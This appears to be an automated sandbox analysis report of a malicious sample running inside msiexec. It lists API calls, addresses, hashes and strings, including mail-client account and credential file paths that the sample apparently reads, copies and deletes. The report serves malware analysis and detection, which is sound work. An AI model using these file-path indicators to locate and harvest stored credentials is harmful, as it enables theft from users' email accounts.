                                                                                                                                                                                                          • Opcode ID: da3c8a0a96baaca5468c22bcf0182be9370c375c43b35f88d10393802dfbb181
                                                                                                                                                                                                          • Instruction ID: e9c30d39fff85267e028ba9276b0476bb6d64a27feab172d9e2ea3dc7e771be9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da3c8a0a96baaca5468c22bcf0182be9370c375c43b35f88d10393802dfbb181
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 521108B3D412127FEA101FB55CA8F2A2E998B16B11F21011FFE0DD2740DEB8C81497A2
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 0485a8139d8e25d7c79607e5c6086a69f76733201f030ebd3084ebaa8e2b282d
• Instruction ID: f6ab5c5e74b6bd3ec6b0831176f10bc7a1855a99180b347f049d8410181127c1
• Opcode Fuzzy Hash: 0485a8139d8e25d7c79607e5c6086a69f76733201f030ebd3084ebaa8e2b282d
• Instruction Fuzzy Hash: D7515C7890060BCBDF00DFA4D98C59DBFB9FF4A312F51468DE588A7654CB768A24CB24
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: 8cb36c7917c8d7af9a9c4eec4ed49d966698ba525e0a59dedf2590dac015e986
• Instruction ID: 45b7989677adba3f7f230fce198c2c0f0edc8b7c51f51cc831c01ddfa465aab7
• Opcode Fuzzy Hash: 8cb36c7917c8d7af9a9c4eec4ed49d966698ba525e0a59dedf2590dac015e986
• Instruction Fuzzy Hash: CB512C7190050ACBDF00DF68E68C99DBFB8FF4A322F604299D54CB6354CB768A25CB55
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21DE1D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21DE1D8A
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: File$Delete$CloseCopyCreateHandleReadSize
• String ID:
• API String ID: 1454806937-0
• Opcode ID: d7ae2618fe17344577e3f7169acc3e260151bc02177eb1134e6a8314347b7e48
• Instruction ID: c1096b6699c97cf31b92dace916388f78f4326f20d0375ae6852aac6f6d8159e
• Opcode Fuzzy Hash: d7ae2618fe17344577e3f7169acc3e260151bc02177eb1134e6a8314347b7e48
• Instruction Fuzzy Hash: 292160B1A4122CFFD711DBA48C8CFEB7AACEB18396F0405A9F505D2140DA759E458B70
Strings
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: 9ef096a49158bcd46ba09b5239d37b6f914fa19a0d5546b5ca442e92a1a53f9e
• Instruction ID: cb9806bbc713a1262e4754bc8a7097eef449180fbdfd4085ed0aa1d15486b28e
• Opcode Fuzzy Hash: 9ef096a49158bcd46ba09b5239d37b6f914fa19a0d5546b5ca442e92a1a53f9e
• Instruction Fuzzy Hash: A111BB32E41A21FBD7129A258C8CE2B3B6C5F067A2F10011DE95DAB181DB35DA50C7E0
APIs
• lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 21DE1038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21DE104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21DE1061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21DE1075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21DE1090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 21DE10B8
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: edd2534cb30f00c43409e06df526338216f1d9d0018c532a745c991554180329
• Instruction ID: 5683168477d0054fb4a7ecdec6448966aa150662709b7049a7db9ec157658374
• Opcode Fuzzy Hash: edd2534cb30f00c43409e06df526338216f1d9d0018c532a745c991554180329
• Instruction Fuzzy Hash: 7D21A135A00329DFCF24DB60DC4CEDF3B68EF48366F10469AE969931A1DE309A95CB50
APIs
  • Part of subcall function 21DE1E89: lstrlenW.KERNEL32(?,?,?,?,?,21DE10DF,?,?,?,00000000), ref: 21DE1E9A
  • Part of subcall function 21DE1E89: lstrcatW.KERNEL32(?,?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EAC
  • Part of subcall function 21DE1E89: lstrlenW.KERNEL32(?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EB3
  • Part of subcall function 21DE1E89: lstrlenW.KERNEL32(?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EC8
  • Part of subcall function 21DE1E89: lstrcatW.KERNEL32(?,21DE10DF,?,21DE10DF,?,?,?,00000000), ref: 21DE1ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 21DE122A
Strings
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$AttributesFile
                                                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                          • API String ID: 1475205934-1520055953
                                                                                                                                                                                                          • Opcode ID: ee81359a9f527e21aee8dcfa15c5ca1257d6bc28644dbdf05c3da38aaab9d36a
                                                                                                                                                                                                          • Instruction ID: 22cd4ae1fb6af6a2e8029d31aa312c650e9b6b2a8b1656e5fb3398538b57c0f9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee81359a9f527e21aee8dcfa15c5ca1257d6bc28644dbdf05c3da38aaab9d36a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21C579A10218EAEB149BD0EC85FED7339EF40B15F00054AF608EB1E0E6B11E848768
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21DE4AEA,?,?,21DE4A8A,?,21DF2238,0000000C,21DE4BBD,00000000,00000000), ref: 21DE4B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21DE4B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,21DE4AEA,?,?,21DE4A8A,?,21DF2238,0000000C,21DE4BBD,00000000,00000000,?,21DE2082), ref: 21DE4B8F
Strings
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: a60506795605ad67783ad75396b5df167d7b7d49c2a15b1d5e99d4c950e8af9e
• Instruction ID: fbffb35b76b5df8de41e37526b2badc468a900870fd3f27d9fafd6e5dcbe0330
• Opcode Fuzzy Hash: a60506795605ad67783ad75396b5df167d7b7d49c2a15b1d5e99d4c950e8af9e
• Instruction Fuzzy Hash: 68F03C31940518FFDB119F91C80CB9EBFB9EF49352F00416CE909A6150DF369A55CB90
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,214E4BF2,00000000,?,214E4B92,00000000,214F9B98,0000000C,214E4CDA,00000000,00000002), ref: 214E4C61
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 214E4C74
• FreeLibrary.KERNEL32(00000000,?,?,?,214E4BF2,00000000,?,214E4B92,00000000,214F9B98,0000000C,214E4CDA,00000000,00000002), ref: 214E4C97
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: f4bf8bcc1569683a8679e063a9742af935829ba8e5e6e8eebb0c5652f34ac19f
• Instruction ID: f8097689899dacec18480b1274abb658dd100a3a91bf2928651b5593f22c0d89
• Opcode Fuzzy Hash: f4bf8bcc1569683a8679e063a9742af935829ba8e5e6e8eebb0c5652f34ac19f
• Instruction Fuzzy Hash: 05F04435541218BFDB119F91C908F9EBFB9EB19715F410158B90DE2350CF349950CB90
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21DE9C07,?,00000000,?,00000000,00000000), ref: 21DE94D4
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 21DE9590
• WriteFile.KERNEL32(?,?,00000000,21DE9C07,00000000,?,?,?,?,?,?,?,?,?,21DE9C07,?), ref: 21DE95AF
• WriteFile.KERNEL32(?,?,?,21DE9C07,00000000,?,?,?,?,?,?,?,?,?,21DE9C07,?), ref: 21DE95E8
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleMultiWide
• String ID:
• API String ID: 977765425-0
• Opcode ID: 5634078e29c385e4a917755994860bbc7fb76f06f8e4a9679d275b544a55ddb2
• Instruction ID: 132750f6c88df107e022f5352a7c745abd8b11271b6f7cf7c91569d9a2c45226
• Opcode Fuzzy Hash: 5634078e29c385e4a917755994860bbc7fb76f06f8e4a9679d275b544a55ddb2
• Instruction Fuzzy Hash: 2C51A071D01209EFDB05CFA8C899AEEBBF8EF49311F14411EE959E7291D630AA51CF60
APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,214EAE1B,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 214EA6E8
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,FF8BC35D,00000005,00000000,00000000), ref: 214EA7A4
• WriteFile.KERNEL32(?,FF8BC35D,00000000,214EAE1B,00000000,?,?,?,?,?,?,?,?,?,214EAE1B,?), ref: 214EA7C3
• WriteFile.KERNEL32(?,?,?,214EAE1B,00000000,?,?,?,?,?,?,?,?,?,214EAE1B,?), ref: 214EA7FC
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleMultiWide
• String ID:
• API String ID: 977765425-0
• Opcode ID: 5e27f5b288191e59e6b16e79b1a469bd2a787d233662808d465c829cc894a939
• Instruction ID: cd644e8f322075ca9f584c8acd2256ddd3248f4fa90dc1d8b6fa53080dba694b
• Opcode Fuzzy Hash: 5e27f5b288191e59e6b16e79b1a469bd2a787d233662808d465c829cc894a939
• Instruction Fuzzy Hash: 945181719002099FDB10CFA4C885EEEBBF9FF19311F24416AEA5DE7351E6309951CBA0
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,21DE10DF,?,?,?,00000000), ref: 21DE1E9A
• lstrcatW.KERNEL32(?,?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EAC
• lstrlenW.KERNEL32(?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EB3
• lstrlenW.KERNEL32(?,?,21DE10DF,?,?,?,00000000), ref: 21DE1EC8
• lstrcatW.KERNEL32(?,21DE10DF,?,21DE10DF,?,?,?,00000000), ref: 21DE1ED3
Memory Dump Source
• Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
• Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: a4f09fee757fb3a6e93cf2ca9881ee20e81e82ebad288751a360bd0d464d7e5c
• Instruction ID: 1b0f609afe7786a11ea3a7aeb4d6484b86f957f3a84033c514cc761705e99fb6
• Opcode Fuzzy Hash: a4f09fee757fb3a6e93cf2ca9881ee20e81e82ebad288751a360bd0d464d7e5c
• Instruction Fuzzy Hash: E4F08926140520FAE6252769AC89E7F7F7CEFC6B62B04041DF60C831909B55595293B5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,21DE190E,?,?,00000000,?,00000000), ref: 21DE1643
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,21DE190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21DE165A
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,21DE190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21DE1661
                                                                                                                                                                                                          • lstrcatW.KERNEL32(00001008,?,?,?,?,?,21DE190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21DE1686
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: lstrcatlstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1475610065-0
                                                                                                                                                                                                          • Opcode ID: fe6901fdce520359a73fc50e746a5c3783f36dea72ba0b80f95dc1e1945e3c2e
                                                                                                                                                                                                          • Instruction ID: ffaa868eac833f489218961a2c0238fbe49e13635c8cce5b42053957219a09ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6901fdce520359a73fc50e746a5c3783f36dea72ba0b80f95dc1e1945e3c2e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221B636A00204EFD7059B54DC84EEE77B8EF8C715F14441EE508EB151DF74AA4587B5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 21DE715C
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 21DE717F
                                                                                                                                                                                                            • Part of subcall function 21DE56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21DE5702
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 21DE71A5
                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 21DE71C7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                                          • Opcode ID: bf253b145a89adb6ea1fea60382806404be09e8d7d3cb7248d47b908476186b7
                                                                                                                                                                                                          • Instruction ID: 57e8286e511691e23307ab73bb5e8a93590098840796f51bfb7c000240bbfe0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf253b145a89adb6ea1fea60382806404be09e8d7d3cb7248d47b908476186b7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A018872601725FF67511AB65C4CD7B6E6EDAC7AE6314026DBF08C7200DE65CC0182F1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 214E962B
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 214E964E
                                                                                                                                                                                                            • Part of subcall function 214E5A9F: RtlAllocateHeap.NTDLL(00000000,214DA5B7,?), ref: 214E5AD1
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 214E9674
                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 214E9696
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                                          • Opcode ID: 05e68579455cda8b550a681d6391a5de6dfa3db1c7bbed7c79284ce8b4d84b75
                                                                                                                                                                                                          • Instruction ID: 57d3b025d985ce5e080d159b4ae7128940bced448e9fd909639f834fd3b104a3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e68579455cda8b550a681d6391a5de6dfa3db1c7bbed7c79284ce8b4d84b75
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60015266A022157F27211A769C8CC7B6E6DDBC6E62312011EBE0CC6380DE748C01CAB0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(21DEC7DD), ref: 21DEC7E6
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,21DEC7DD), ref: 21DEC838
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 21DEC860
                                                                                                                                                                                                            • Part of subcall function 21DEC803: GetProcAddress.KERNEL32(00000000,21DEC7F4), ref: 21DEC804
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1646373207-0
                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction ID: 05339d9331769f2d432ff5c392d87dff12aa66369e7fc6aed52ae5ef77b2f3e4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5601261054524AFCB61352740ECDAAA6FDC9B2B673B101F5EE24CC61A3C99C8501C3B6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(214F1794), ref: 214F179D
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,214F1794), ref: 214F17EF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 214F1817
                                                                                                                                                                                                            • Part of subcall function 214F17BA: GetProcAddress.KERNEL32(00000000,214F17AB), ref: 214F17BB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1646373207-0
                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction ID: c4832d1a3a487925b9055279768382425e14906c29a927184ac5a0d55823a243
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5701F101A452823DFB1256B50E41AFB9FCCDB33EA0F10074EA20DD7393C9B0810693B2
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,?,?,214DCACD,?,?,?,?), ref: 214DCB5E
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,214DCACD,?,?,?,?), ref: 214DCB6A
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,214DCACD,?,?,?,?), ref: 214DCB78
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 6f5d35ebabc4ae897b577d68f95f9461fcea9c2cb680c79dd05c9dd75f509516
• Instruction ID: 82bead8dabf114de8a48e426bcdae5d90a60252f1106c0e524f11a7bace7014f
• Opcode Fuzzy Hash: 6f5d35ebabc4ae897b577d68f95f9461fcea9c2cb680c79dd05c9dd75f509516
• Instruction Fuzzy Hash: 1301D83324523B5BCB124E39AC65E477758EF4A661B100538EE4ED7381DE34D61197E4
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21DE1D66,00000000,00000000,?,21DE5C88,21DE1D66,00000000,00000000,00000000,?,21DE5E85,00000006,FlsSetValue), ref: 21DE5D13
